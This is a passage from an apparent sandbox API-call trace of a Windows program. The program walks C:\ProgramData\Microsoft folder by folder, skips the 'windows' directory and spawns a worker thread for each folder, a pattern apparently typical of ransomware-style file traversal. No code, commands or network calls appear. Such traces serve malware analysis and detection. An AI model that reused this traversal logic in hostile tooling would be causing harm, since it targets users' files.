lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.440] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.440] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="IdentityCRL" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL" [0039.440] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*" [0039.440] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a32f30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.463] CloseHandle (hObject=0x1ac) returned 1 [0039.463] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0039.463] lstrcmpW (lpString1=".", lpString2="Media Player") returned -1 [0039.463] lstrcmpW (lpString1="..", lpString2="Media Player") returned -1 [0039.463] lstrcmpiW (lpString1="windows", lpString2="Media Player") returned 1 [0039.463] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.463] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.463] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="Media Player" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player" [0039.463] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*.*" [0039.463] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.463] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cc0458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.490] CloseHandle (hObject=0x1ac) returned 1 [0039.490] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MF", cAlternateFileName="")) returned 1 [0039.490] lstrcmpW (lpString1=".", lpString2="MF") returned -1 [0039.490] lstrcmpW (lpString1="..", lpString2="MF") returned -1 [0039.490] lstrcmpiW (lpString1="windows", lpString2="MF") returned 1 [0039.491] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.492] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.492] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="MF" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF" [0039.492] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*" [0039.492] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.492] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a930d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.502] CloseHandle (hObject=0x1ac) returned 1 [0039.502] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSDN", cAlternateFileName="")) returned 1 [0039.502] lstrcmpW (lpString1=".", lpString2="MSDN") returned -1 [0039.502] lstrcmpW (lpString1="..", lpString2="MSDN") returned -1 [0039.502] lstrcmpiW (lpString1="windows", lpString2="MSDN") returned 1 [0039.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.505] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="MSDN" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN" [0039.505] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*.*" [0039.505] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10790048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.513] CloseHandle (hObject=0x1ac) returned 1 [0039.513] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0039.513] lstrcmpW (lpString1=".", lpString2="NetFramework") returned -1 [0039.513] lstrcmpW (lpString1="..", lpString2="NetFramework") returned -1 [0039.513] lstrcmpiW (lpString1="windows", lpString2="NetFramework") returned 1 [0039.513] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.513] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.513] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="NetFramework" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework" [0039.513] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*.*" [0039.513] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33f8320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.521] CloseHandle (hObject=0x1ac) returned 1 [0039.521] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0039.521] lstrcmpW (lpString1=".", lpString2="Network") returned -1 [0039.521] lstrcmpW (lpString1="..", lpString2="Network") returned -1 [0039.521] lstrcmpiW (lpString1="windows", lpString2="Network") returned 1 [0039.523] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.523] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.523] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="Network" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network" [0039.523] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*" [0039.523] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.523] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107f01e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.530] CloseHandle (hObject=0x1ac) returned 1 [0039.530] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE", cAlternateFileName="")) returned 1 [0039.530] lstrcmpW (lpString1=".", lpString2="OFFICE") returned -1 [0039.530] lstrcmpW (lpString1="..", lpString2="OFFICE") returned -1 [0039.530] lstrcmpiW (lpString1="windows", lpString2="OFFICE") returned 1 [0039.532] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.532] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.532] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="OFFICE" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE" [0039.532] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" [0039.532] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.532] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108202b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.540] CloseHandle (hObject=0x1ac) returned 1 [0039.540] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0039.540] lstrcmpW (lpString1=".", lpString2="OfficeSoftwareProtectionPlatform") returned -1 [0039.540] lstrcmpW (lpString1="..", lpString2="OfficeSoftwareProtectionPlatform") returned -1 [0039.540] lstrcmpiW (lpString1="windows", lpString2="OfficeSoftwareProtectionPlatform") returned 1 [0039.547] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.547] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.547] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="OfficeSoftwareProtectionPlatform" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform" [0039.547] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" [0039.547] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.547] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10850388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0040.526] CloseHandle (hObject=0x194) returned 1 [0040.526] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RAC", cAlternateFileName="")) returned 1 [0040.527] lstrcmpW (lpString1=".", lpString2="RAC") returned -1 [0040.527] lstrcmpW (lpString1="..", lpString2="RAC") returned -1 [0040.527] lstrcmpiW (lpString1="windows", lpString2="RAC") returned 1 [0040.527] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0040.527] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0040.527] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="RAC" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC" [0040.527] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*.*" [0040.527] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0040.527] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5dc88d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0040.528] CloseHandle (hObject=0x194) returned 1 [0040.528] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0040.528] lstrcmpW (lpString1=".", lpString2="Search") returned -1 [0040.528] lstrcmpW (lpString1="..", lpString2="Search") returned -1 [0040.528] lstrcmpiW (lpString1="windows", lpString2="Search") returned 1 [0040.528] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0040.528] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0040.528] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="Search" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search" [0040.528] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*.*" [0040.528] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0040.528] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a02e60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0040.529] CloseHandle (hObject=0x194) returned 1 [0040.529] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0040.529] lstrcmpW (lpString1=".", lpString2="User Account Pictures") returned -1 [0040.529] lstrcmpW (lpString1="..", lpString2="User Account Pictures") returned -1 [0040.529] lstrcmpiW (lpString1="windows", lpString2="User Account Pictures") returned 1 [0040.529] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0040.529] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0040.529] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="User Account Pictures" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures" [0040.529] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" [0040.529] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0040.529] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x998ac58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0040.530] CloseHandle (hObject=0x194) returned 1 [0040.530] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0040.530] lstrcmpW (lpString1=".", lpString2="Vault") returned -1 [0040.530] lstrcmpW (lpString1="..", lpString2="Vault") returned -1 [0040.530] lstrcmpiW (lpString1="windows", lpString2="Vault") returned 1 [0040.530] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0040.530] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0040.530] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="Vault" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Vault" [0040.530] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*.*" [0040.530] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0040.531] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x42205f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0040.531] CloseHandle (hObject=0x194) returned 1 [0040.531] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0040.531] lstrcmpW (lpString1=".", lpString2="VISIO") returned -1 [0040.531] lstrcmpW (lpString1="..", lpString2="VISIO") returned -1 [0040.532] lstrcmpiW (lpString1="windows", lpString2="VISIO") returned 1 [0040.534] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0040.534] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0040.534] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="VISIO" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO") returned="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO" [0040.534] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*.*" [0040.534] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0040.534] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11017660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0040.535] CloseHandle (hObject=0x194) returned 1 [0040.535] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60ae73a0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x60ae73a0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0040.535] lstrcmpW (lpString1=".", lpString2="Windows") returned -1 [0040.535] lstrcmpW (lpString1="..", lpString2="Windows") returned -1 [0040.535] lstrcmpiW (lpString1="windows", lpString2="Windows") returned 0 [0040.535] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0040.535] lstrcmpW (lpString1=".", lpString2="Windows Defender") returned -1 [0040.535] lstrcmpW (lpString1="..", lpString2="Windows Defender") returned -1 [0040.535] lstrcmpiW (lpString1="windows", lpString2="Windows Defender") returned -1 [0040.537] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0040.537] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0040.537] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="Windows Defender" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender" [0040.537] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" [0040.537] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0040.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1102f6c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0040.538] CloseHandle (hObject=0x194) returned 1 [0040.538] 